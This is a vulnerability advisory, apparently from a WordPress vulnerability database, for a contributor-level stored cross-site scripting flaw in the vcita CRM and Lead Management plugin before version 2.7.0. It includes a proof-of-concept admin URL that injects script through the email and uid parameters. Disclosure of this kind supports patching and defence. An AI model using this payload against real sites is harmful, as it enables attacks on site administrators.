Lucene search

K

WpvulndbWPVDB-ID:EF15742F-CF83-458B-903D-7E024FE880BD

HistoryJun 02, 2023 - 12:00 a.m.

CRM and Lead Management by vcita < 2.7.0 - Contributor+ Stored Cross-Site Scripting

2023-06-0200:00:00

wpscan.com

4

crm

lead management

vcita

stored cross-site scripting

cross-site scripting

plugin

security

injection

EPSS

0.001

Percentile

39.4%

The plugin does not sanitize and escape the email and uid parameters in the plugin settings before rendering it on the page, which could allow users with roles as low as contributor to inject arbitrary web scripts targeting high privilege users such as administrators.

PoC

https://example.com/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-callback.php&success;=true&first;_name=a-a&last;_name=b&title;=c&confirmation;_token=d&confirmed;=true&engage;_delay=1&implementation;_key=1&email;=a“/>&uid;=a”alert(2);

References

blog.jonh.eu/blog/security-vulnerabilities-in-wordpress-plugins-by-vcita

plugins.trac.wordpress.org/browser/crm-customer-relationship-management-by-vcita/trunk/vcita-callback.php

EPSS

0.001

Percentile

39.4%

Related for WPVDB-ID:EF15742F-CF83-458B-903D-7E024FE880BD

prion1 nvd1 wpexploit1 cvelist1 cve1 wordfence1